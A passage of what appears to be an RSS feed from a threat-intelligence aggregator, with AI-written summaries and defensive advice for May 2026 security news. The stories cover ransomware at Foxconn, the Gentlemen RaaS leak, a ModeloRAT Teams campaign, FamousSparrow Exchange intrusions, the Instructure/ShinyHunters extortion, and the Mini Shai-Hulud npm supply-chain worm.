&lt;p&gt;Leverage the leaked information to understand RaaS recruitment and TTPs, and implement robust backup and response strategies to mitigate ransomware impact.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Dark Reading | &lt;a href=&quot;https://www.darkreading.com/threat-intelligence/gentlemen-raas-gang-data-leak&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 13 May 2026 20:47:46 GMT</pubDate>
      <dc:creator>Nate Nelson</dc:creator>
      <source url="https://www.darkreading.com/threat-intelligence/gentlemen-raas-gang-data-leak">Dark Reading</source>
      <category>Malware</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Foxconn Confirms North American Factories Hit by Cyberattack</title>
      <link>https://brewedintel.io/articles/47402b75-60a6-4284-8ffd-114abf366f26</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/47402b75-60a6-4284-8ffd-114abf366f26</guid>
      <description>Foxconn confirmed a cyberattack on its North American factories, claimed by the Nitrogen ransomware group. The attackers stole 8TB of data, including confidential documents, and extorted the company. The incident highlights risks to critical manufacturing supply chains and sensitive intellectual property. Mitigation should focus on network segmentation, access controls, and proactive threat hunting to defend against ransomware.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Foxconn confirmed a cyberattack on its North American factories, claimed by the Nitrogen ransomware group. The attackers stole 8TB of data, including confidential documents, and extorted the company. The incident highlights risks to critical manufacturing supply chains and sensitive intellectual property. Mitigation should focus on network segmentation, access controls, and proactive threat hunting to defend against ransomware.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Foxconn is a critical electronics manufacturer; a breach of this scale can disrupt global supply chains and expose sensitive client data, affecting numerous downstream organizations.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement network segmentation, enforce least-privilege access, regularly back up critical data offline, and conduct tabletop exercises to ensure readiness against ransomware extortion.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SecurityWeek | &lt;a href=&quot;https://www.securityweek.com/foxconn-confirms-north-american-factories-hit-by-cyberattack/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 13 May 2026 17:13:36 GMT</pubDate>
      <dc:creator>Eduard Kovacs</dc:creator>
      <source url="https://www.securityweek.com/foxconn-confirms-north-american-factories-hit-by-cyberattack/">SecurityWeek</source>
      <category>Malware</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>When IT Support Calls: Dissecting a ModeloRAT Campaign from Teams to Domain Compromise</title>
      <link>https://brewedintel.io/articles/b6f80ead-738e-442e-bd87-d9c083026376</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/b6f80ead-738e-442e-bd87-d9c083026376</guid>
      <description>In April 2026, Rapid7 investigated an intrusion starting with a fake Microsoft Teams IT Support message, which led to a Python-based ModeloRAT payload delivered via Dropbox. The attacker escalated privileges using CVE-2023-36036, then deployed a fake lock screen to capture domain credentials. With valid credentials, they moved laterally via WinRM and RDP, dumped LSASS memory with DumpIt, and exfiltrated data via anonymous file-sharing services. The campaign highlights the evolving threat of collaboration platform abuse and the rapid shift from endpoint to identity compromise, emphasizing the need for integrated security controls across collaboration, identity, and endpoint domains.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;In April 2026, Rapid7 investigated an intrusion starting with a fake Microsoft Teams IT Support message, which led to a Python-based ModeloRAT payload delivered via Dropbox. The attacker escalated privileges using CVE-2023-36036, then deployed a fake lock screen to capture domain credentials. With valid credentials, they moved laterally via WinRM and RDP, dumped LSASS memory with DumpIt, and exfiltrated data via anonymous file-sharing services. The campaign highlights the evolving threat of collaboration platform abuse and the rapid shift from endpoint to identity compromise, emphasizing the need for integrated security controls across collaboration, identity, and endpoint domains.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This attack chain shows how social engineering via a trusted collaboration platform, combined with living-off-the-land techniques and a two-year-old kernel exploit, can achieve domain-wide credential theft and exfiltration in under 48 hours, bypassing many traditional defenses.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Restrict external Teams access, patch CVE-2023-36036, monitor for unusual Python/PowerShell execution and WebDAV authentication attempts, and enforce strong identity protection measures such as phishing-resistant MFA and user education on impersonation tactics.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Vulnerability, High Severity, Credential Theft, Privilege Escalation, Spear Phishing&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Rapid7 Security Research | &lt;a href=&quot;https://www.rapid7.com/blog/post/tr-it-support-dissecting-modelorat-campaign-microsoft-teams-compromise&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 13 May 2026 14:44:02 GMT</pubDate>
      <dc:creator>Anna Širokova</dc:creator>
      <source url="https://www.rapid7.com/blog/post/tr-it-support-dissecting-modelorat-campaign-microsoft-teams-compromise">Rapid7 Security Research</source>
      <category>Vulnerability</category>
      <category>Credential Theft</category>
      <category>Privilege Escalation</category>
      <category>Spear Phishing</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Thus Spoke…The Gentlemen</title>
      <link>https://brewedintel.io/articles/5cff3ce1-34b6-4015-92f0-6e29cbb15fdc</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/5cff3ce1-34b6-4015-92f0-6e29cbb15fdc</guid>
      <description>The Gentlemen is a ransomware-as-a-service operation that emerged in mid-2025. By May 2026, it became one of the most active RaaS programs, with approximately 332 victims. An internal database leak exposed operational details including affiliate communications, exploited CVEs (e.g., Fortinet, Cisco), and ransom negotiations (e.g., a $250k demand settled for $190k). The group uses dual extortion, leveraging stolen data from one victim to pressure another. Affiliates deploy SystemBC backdoor for C2. The administrator also participates directly in attacks. The impact includes significant financial losses and data breaches. Mitigation requires patching edge devices and monitoring for SystemBC.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The Gentlemen is a ransomware-as-a-service operation that emerged in mid-2025. By May 2026, it became one of the most active RaaS programs, with approximately 332 victims. An internal database leak exposed operational details including affiliate communications, exploited CVEs (e.g., Fortinet, Cisco), and ransom negotiations (e.g., a $250k demand settled for $190k). The group uses dual extortion, leveraging stolen data from one victim to pressure another. Affiliates deploy SystemBC backdoor for C2. The administrator also participates directly in attacks. The impact includes significant financial losses and data breaches. Mitigation requires patching edge devices and monitoring for SystemBC.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;The Gentlemen is a highly active RaaS operation exploiting known CVEs for initial access and using dual extortion, posing a clear threat to organizations worldwide.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Prioritize patching Fortinet and Cisco devices, implement NTLM relay protections, and monitor for SystemBC malware. Maintain offline backups and conduct regular recovery exercises.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Data Extortion, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Check Point Research | &lt;a href=&quot;https://research.checkpoint.com/2026/thus-spoke-the-gentlemen/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 13 May 2026 13:01:01 GMT</pubDate>
      <dc:creator>antoniost@checkpoint.com</dc:creator>
      <source url="https://research.checkpoint.com/2026/thus-spoke-the-gentlemen/">Check Point Research</source>
      <category>Malware</category>
      <category>Data Extortion</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>China&#x27;s &#x27;FamousSparrow&#x27; APT Nests in South Caucasus Energy Firm</title>
      <link>https://brewedintel.io/articles/8ce8681d-9408-4954-adef-bd04118f069b</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/8ce8681d-9408-4954-adef-bd04118f069b</guid>
      <description>The China-linked APT group FamousSparrow has been observed repeatedly targeting an Azerbaijani oil and gas company, extending its operations beyond traditional sectors like hospitality, telecom, and government. This shift indicates a broadening scope that threatens critical energy infrastructure in the South Caucasus region. The persistent attacks aim at cyber espionage, potentially leading to operational disruption, intellectual property theft, and increased geopolitical tensions. Defenders in the energy sector should prioritize monitoring for FamousSparrow indicators of compromise and adopt robust cybersecurity measures to mitigate this advanced threat.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The China-linked APT group FamousSparrow has been observed repeatedly targeting an Azerbaijani oil and gas company, extending its operations beyond traditional sectors like hospitality, telecom, and government. This shift indicates a broadening scope that threatens critical energy infrastructure in the South Caucasus region. The persistent attacks aim at cyber espionage, potentially leading to operational disruption, intellectual property theft, and increased geopolitical tensions. Defenders in the energy sector should prioritize monitoring for FamousSparrow indicators of compromise and adopt robust cybersecurity measures to mitigate this advanced threat.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;As a China-linked APT, FamousSparrow is now targeting the energy sector, which can lead to significant operational disruptions or theft of proprietary data, impacting national security.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Monitor for known FamousSparrow TTPs, implement network segmentation, and conduct phishing awareness training to reduce initial access vectors.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, High Severity, APT, Cyber Espionage&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Dark Reading | &lt;a href=&quot;https://www.darkreading.com/cyberattacks-data-breaches/china-famoussparrow-apt-south-caucasus-energy-firm&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 13 May 2026 13:00:00 GMT</pubDate>
      <dc:creator>Robert Lemos</dc:creator>
      <source url="https://www.darkreading.com/cyberattacks-data-breaches/china-famoussparrow-apt-south-caucasus-energy-firm">Dark Reading</source>
      <category>Adversary</category>
      <category>APT</category>
      <category>Cyber Espionage</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Azerbaijani Energy Firm Hit by Repeated Microsoft Exchange Exploitation</title>
      <link>https://brewedintel.io/articles/97939e4d-dd11-4825-982c-acce17494e7c</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/97939e4d-dd11-4825-982c-acce17494e7c</guid>
      <description>A China-affiliated threat group, identified as FamousSparrow (UAT-9244), executed a multi-wave intrusion against an Azerbaijani energy firm from late December 2025 to February 2026. The campaign leveraged repeated exploitation of Microsoft Exchange vulnerabilities to establish persistent access and expand its operational footprint within the targeted oil and gas organization. This activity highlights the ongoing risk of state-linked adversaries targeting critical infrastructure through widely utilized enterprise mail servers. While specific malware strains were not disclosed, the sustained exploitation underscores the necessity for rigorous patch management and advanced monitoring of Exchange environments. Organizations relying on Microsoft Exchange must prioritize timely vulnerability remediation, enforce strict multi-factor authentication, and implement network segmentation to limit lateral movement. Continuous threat hunting for anomalous Exchange logs and unauthorized mailbox rules is essential to detect and mitigate similar multi-phase intrusions before operational disruption occurs.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;A China-affiliated threat group, identified as FamousSparrow (UAT-9244), executed a multi-wave intrusion against an Azerbaijani energy firm from late December 2025 to February 2026. The campaign leveraged repeated exploitation of Microsoft Exchange vulnerabilities to establish persistent access and expand its operational footprint within the targeted oil and gas organization. This activity highlights the ongoing risk of state-linked adversaries targeting critical infrastructure through widely utilized enterprise mail servers. While specific malware strains were not disclosed, the sustained exploitation underscores the necessity for rigorous patch management and advanced monitoring of Exchange environments. Organizations relying on Microsoft Exchange must prioritize timely vulnerability remediation, enforce strict multi-factor authentication, and implement network segmentation to limit lateral movement. Continuous threat hunting for anomalous Exchange logs and unauthorized mailbox rules is essential to detect and mitigate similar multi-phase intrusions before operational disruption occurs.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This intrusion demonstrates how persistent exploitation of unpatched Exchange servers enables state-linked actors to gain deep access to critical energy infrastructure.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Immediately patch all Exchange deployments, enforce conditional access policies, and monitor for anomalous mailbox rule creation and suspicious external API calls.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, Advanced Persistent Threat, Exploitation&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/azerbaijani-energy-firm-hit-by-repeated.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 13 May 2026 13:00:00 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/azerbaijani-energy-firm-hit-by-repeated.html">The Hacker News</source>
      <category>Incident</category>
      <category>Advanced Persistent Threat</category>
      <category>Exploitation</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Foxconn confirms cyberattack claimed by Nitrogen ransomware gang</title>
      <link>https://brewedintel.io/articles/9cc2fdb7-940b-42d4-af49-d95bd8ac2c64</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/9cc2fdb7-940b-42d4-af49-d95bd8ac2c64</guid>
      <description>Foxconn, the world&#x27;s largest electronics manufacturer, confirmed a ransomware attack on its North American factories, claimed by the Nitrogen ransomware gang. The attack disrupted operations, potentially encrypting critical data and demanding ransom. Foxconn is working to restore normalcy, but the incident highlights the vulnerability of supply chains to ransomware. Immediate impacts include production delays and financial costs. Mitigation involves isolating affected systems, restoring from backups, and enhancing network segmentation and employee phishing awareness. The breach underscores the need for robust incident response plans and cyber resilience.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Foxconn, the world&amp;#x27;s largest electronics manufacturer, confirmed a ransomware attack on its North American factories, claimed by the Nitrogen ransomware gang. The attack disrupted operations, potentially encrypting critical data and demanding ransom. Foxconn is working to restore normalcy, but the incident highlights the vulnerability of supply chains to ransomware. Immediate impacts include production delays and financial costs. Mitigation involves isolating affected systems, restoring from backups, and enhancing network segmentation and employee phishing awareness. The breach underscores the need for robust incident response plans and cyber resilience.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Ransomware attacks on major manufacturers like Foxconn can cause significant operational disruptions, financial losses, and supply chain impacts, affecting downstream customers.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement robust backup and disaster recovery procedures, enforce network segmentation, conduct regular phishing simulations, and maintain up-to-date incident response plans to mitigate ransomware risks.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Bleeping Computer | &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/electronics-giant-foxconn-confirms-cyberattack-on-north-american-factories/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 13 May 2026 12:49:54 GMT</pubDate>
      <dc:creator>Sergiu Gatlan</dc:creator>
      <source url="https://www.bleepingcomputer.com/news/security/electronics-giant-foxconn-confirms-cyberattack-on-north-american-factories/">Bleeping Computer</source>
      <category>Malware</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Instructure settles with hackers following massive student data theft</title>
      <link>https://brewedintel.io/articles/71a17401-34f3-405d-9ade-697742ac92c6</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/71a17401-34f3-405d-9ade-697742ac92c6</guid>
      <description>Educational tech company Instructure, developer of the Canvas LMS, settled with ShinyHunters after a data breach exposed personal information of millions of students. Attackers exploited a flaw in the Free-for-Teacher environment and stole approximately 3.65TB of data, including names, email addresses, student IDs, and messages. While passwords and financial info were not compromised, the data can be used for targeted phishing. Instructure paid the extortion group to return and destroy the data, and confirmed no further extortion of customers. The U.S. House Committee on Homeland Security is investigating. This incident highlights the risks facing educational institutions and the growing trend of data theft and extortion.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Educational tech company Instructure, developer of the Canvas LMS, settled with ShinyHunters after a data breach exposed personal information of millions of students. Attackers exploited a flaw in the Free-for-Teacher environment and stole approximately 3.65TB of data, including names, email addresses, student IDs, and messages. While passwords and financial info were not compromised, the data can be used for targeted phishing. Instructure paid the extortion group to return and destroy the data, and confirmed no further extortion of customers. The U.S. House Committee on Homeland Security is investigating. This incident highlights the risks facing educational institutions and the growing trend of data theft and extortion.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This breach demonstrates that attackers can leverage stolen user identifiers—even without passwords—to launch convincing phishing campaigns against students, staff, and parents, leading to further compromise.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Organizations using Canvas should review access logs for suspicious activity, implement multi-factor authentication, and provide user awareness training focused on phishing. Ensure incident response plans cover extortion attempts and data destruction verification.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Data Breach, Extortion&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Security Affairs (Data Breach) | &lt;a href=&quot;https://securityaffairs.com/192059/cyber-crime/instructure-settles-with-hackers-following-massive-student-data-theft.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 13 May 2026 10:16:15 GMT</pubDate>
      <dc:creator>Pierluigi Paganini</dc:creator>
      <source url="https://securityaffairs.com/192059/cyber-crime/instructure-settles-with-hackers-following-massive-student-data-theft.html">Security Affairs (Data Breach)</source>
      <category>Malware</category>
      <category>Data Breach</category>
      <category>Extortion</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>US govt seeks Instructure testimony on massive Canvas cyberattack</title>
      <link>https://brewedintel.io/articles/84226112-bf57-4296-ba5d-3c587f60c264</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/84226112-bf57-4296-ba5d-3c587f60c264</guid>
      <description>The U.S. House Committee on Homeland Security is investigating two cyberattacks by the ShinyHunters extortion group targeting Instructure&#x27;s Canvas learning platform. The attacks resulted in theft of student data and disruption of school operations during final exams. The committee has called for testimony from Instructure executives to address security failures and prevent future incidents.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The U.S. House Committee on Homeland Security is investigating two cyberattacks by the ShinyHunters extortion group targeting Instructure&amp;#x27;s Canvas learning platform. The attacks resulted in theft of student data and disruption of school operations during final exams. The committee has called for testimony from Instructure executives to address security failures and prevent future incidents.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This attack compromised sensitive student data and disrupted educational services, posing legal and reputational risks to institutions.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement multi-factor authentication, strengthen access controls, and conduct regular security audits for critical platforms.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Data Breach, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Bleeping Computer | &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/us-govt-seeks-instructure-testimony-on-massive-canvas-cyberattack/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 12 May 2026 23:09:55 GMT</pubDate>
      <dc:creator>Lawrence Abrams</dc:creator>
      <source url="https://www.bleepingcomputer.com/news/security/us-govt-seeks-instructure-testimony-on-massive-canvas-cyberattack/">Bleeping Computer</source>
      <category>Malware</category>
      <category>Data Breach</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Mini Shai-Hulud: Supply Chain Malware Attack</title>
      <link>https://brewedintel.io/articles/6e59ebcc-bb7a-42da-82fb-57e2d965e77e</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/6e59ebcc-bb7a-42da-82fb-57e2d965e77e</guid>
      <description>A coordinated supply chain attack tracked as Mini Shai-Hulud, attributed to the TeamPCP threat actor, compromised dozens of npm and PyPI packages across major projects including TanStack, UiPath, Mistral AI, and guardrails-ai. The attackers used GitHub Actions cache poisoning and token exfiltration techniques to publish malicious versions on May 11–12, 2026. This attack highlights the risk of supply chain compromises in open-source ecosystems, potentially leading to widespread infection and data theft. Immediate mitigation includes verifying package integrity, auditing dependencies, and securing CI/CD pipelines.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;A coordinated supply chain attack tracked as Mini Shai-Hulud, attributed to the TeamPCP threat actor, compromised dozens of npm and PyPI packages across major projects including TanStack, UiPath, Mistral AI, and guardrails-ai. The attackers used GitHub Actions cache poisoning and token exfiltration techniques to publish malicious versions on May 11–12, 2026. This attack highlights the risk of supply chain compromises in open-source ecosystems, potentially leading to widespread infection and data theft. Immediate mitigation includes verifying package integrity, auditing dependencies, and securing CI/CD pipelines.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This supply chain attack compromises trusted open-source packages, potentially granting attackers access to sensitive data and systems across multiple organizations.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Immediately audit your dependencies for the affected packages, verify integrity using checksums, and review GitHub Actions workflows for cache poisoning vulnerabilities.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, Critical Severity, Supply Chain Attack&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Arctic Wolf Labs | &lt;a href=&quot;https://arcticwolf.com/resources/blog/mini-shai-hulud-supply-chain-malware-attack/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 12 May 2026 16:49:18 GMT</pubDate>
      <dc:creator>Arctic Wolf</dc:creator>
      <source url="https://arcticwolf.com/resources/blog/mini-shai-hulud-supply-chain-malware-attack/">Arctic Wolf Labs</source>
      <category>Malware</category>
      <category>Supply Chain Attack</category>
      <category>Critical Severity</category>
    </item>
    <item>
      <title>Worm Redux: Fresh Mini Shai-Hulud Infections Bite Supply Chain</title>
      <link>https://brewedintel.io/articles/f22fdfaf-0a44-4d69-a029-ea9eb19a7771</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/f22fdfaf-0a44-4d69-a029-ea9eb19a7771</guid>
      <description>A self-propagating credential-stealing worm named Mini Shai-Hulud, attributed to the threat group TeamPCP, has infected hundreds of npm packages within the open source TanStack ecosystem. This supply chain attack allows the worm to spread widely, compromising credentials of users who install the affected packages. The impact is significant, potentially leading to unauthorized access to sensitive systems and data across multiple organizations. To mitigate, teams should immediately review their npm dependencies for compromised packages, update to secure versions, and monitor for credential theft indicators. Long-term measures include implementing software composition analysis, enforcing strict repository controls, and conducting regular security audits of open source dependencies.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;A self-propagating credential-stealing worm named Mini Shai-Hulud, attributed to the threat group TeamPCP, has infected hundreds of npm packages within the open source TanStack ecosystem. This supply chain attack allows the worm to spread widely, compromising credentials of users who install the affected packages. The impact is significant, potentially leading to unauthorized access to sensitive systems and data across multiple organizations. To mitigate, teams should immediately review their npm dependencies for compromised packages, update to secure versions, and monitor for credential theft indicators. Long-term measures include implementing software composition analysis, enforcing strict repository controls, and conducting regular security audits of open source dependencies.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This worm can infiltrate your software supply chain, potentially compromising sensitive credentials across multiple systems and leading to widespread data breaches.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Regularly audit and update all npm dependencies, implement strict repository controls, and monitor for anomalous network activity that may indicate credential theft.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Credential Theft, Supply Chain Attack, Worm&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Dark Reading | &lt;a href=&quot;https://www.darkreading.com/application-security/worm-redux-fresh-mini-shai-hulud-infections-bite-supply-chain&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 12 May 2026 11:07:43 GMT</pubDate>
      <dc:creator>Elizabeth Montalbano</dc:creator>
      <source url="https://www.darkreading.com/application-security/worm-redux-fresh-mini-shai-hulud-infections-bite-supply-chain">Dark Reading</source>
      <category>Malware</category>
      <category>Credential Theft</category>
      <category>Supply Chain Attack</category>
      <category>Worm</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>TanStack, Mistral AI, UiPath Hit in Fresh Supply Chain Attack</title>
      <link>https://brewedintel.io/articles/7a092c03-62e5-4ac1-9b8b-ab47ab8a8f72</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/7a092c03-62e5-4ac1-9b8b-ab47ab8a8f72</guid>
      <description>A fresh supply chain attack dubbed &#x27;Mini Shai-Hulud&#x27; has been discovered, with over 400 malicious versions of 170 packages published. The campaign targets open-source ecosystems, hitting prominent organizations including TanStack, Mistral AI, and UiPath. These malicious packages likely serve as initial infection vectors, enabling attackers to execute arbitrary code on compromised systems. The scale and targeted nature of this attack underscore the persistent risk of supply chain compromise. Organizations must review their dependency trees, audit package sources, and implement integrity checks to mitigate similar threats.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;A fresh supply chain attack dubbed &amp;#x27;Mini Shai-Hulud&amp;#x27; has been discovered, with over 400 malicious versions of 170 packages published. The campaign targets open-source ecosystems, hitting prominent organizations including TanStack, Mistral AI, and UiPath. These malicious packages likely serve as initial infection vectors, enabling attackers to execute arbitrary code on compromised systems. The scale and targeted nature of this attack underscore the persistent risk of supply chain compromise. Organizations must review their dependency trees, audit package sources, and implement integrity checks to mitigate similar threats.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This supply chain attack delivered hundreds of malicious packages to widely used software vendors, directly threatening organizations that integrate these dependencies.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Audit your software bill of materials for any of the identified malicious packages, enforce strict package signing and integrity verification, and monitor for unusual behaviors in development environments.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, High Severity, Supply Chain Attack&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SecurityWeek | &lt;a href=&quot;https://www.securityweek.com/tanstack-mistral-ai-uipath-hit-in-fresh-supply-chain-attack/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 12 May 2026 10:10:33 GMT</pubDate>
      <dc:creator>Ionut Arghire</dc:creator>
      <source url="https://www.securityweek.com/tanstack-mistral-ai-uipath-hit-in-fresh-supply-chain-attack/">SecurityWeek</source>
      <category>Adversary</category>
      <category>Supply Chain Attack</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Instructure reaches &#x27;agreement&#x27; with ShinyHunters to stop data leak</title>
      <link>https://brewedintel.io/articles/c7d0e9fb-553b-4db9-85e0-ae248df19bcb</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/c7d0e9fb-553b-4db9-85e0-ae248df19bcb</guid>
      <description>The article reports that Instructure, the developer of the Canvas learning management system, negotiated a settlement with the ShinyHunters extortion group to prevent the public release of compromised institutional data. This incident highlights the escalating threat of cyber extortion targeting educational technology providers, which can lead to widespread data exposure for students, faculty, and affiliated institutions. While specific attack vectors and malware were not disclosed, the situation underscores the critical need for robust data loss prevention and incident response capabilities. Organizations relying on Canvas should verify their security posture, ensure backup integrity, and maintain clear communication channels with vendors regarding breach notifications. Proactive threat hunting and enhanced monitoring of data access patterns are essential to mitigate future extortion risks.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The article reports that Instructure, the developer of the Canvas learning management system, negotiated a settlement with the ShinyHunters extortion group to prevent the public release of compromised institutional data. This incident highlights the escalating threat of cyber extortion targeting educational technology providers, which can lead to widespread data exposure for students, faculty, and affiliated institutions. While specific attack vectors and malware were not disclosed, the situation underscores the critical need for robust data loss prevention and incident response capabilities. Organizations relying on Canvas should verify their security posture, ensure backup integrity, and maintain clear communication channels with vendors regarding breach notifications. Proactive threat hunting and enhanced monitoring of data access patterns are essential to mitigate future extortion risks.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;The compromise of a major edtech provider like Instructure poses significant risk to affiliated institutions, potentially exposing sensitive student and faculty data to public leak or further exploitation.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Validate your organization&amp;#x27;s Canvas security settings, review incident response playbooks for vendor data breaches, and enforce strict data access controls and monitoring to limit potential fallout.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
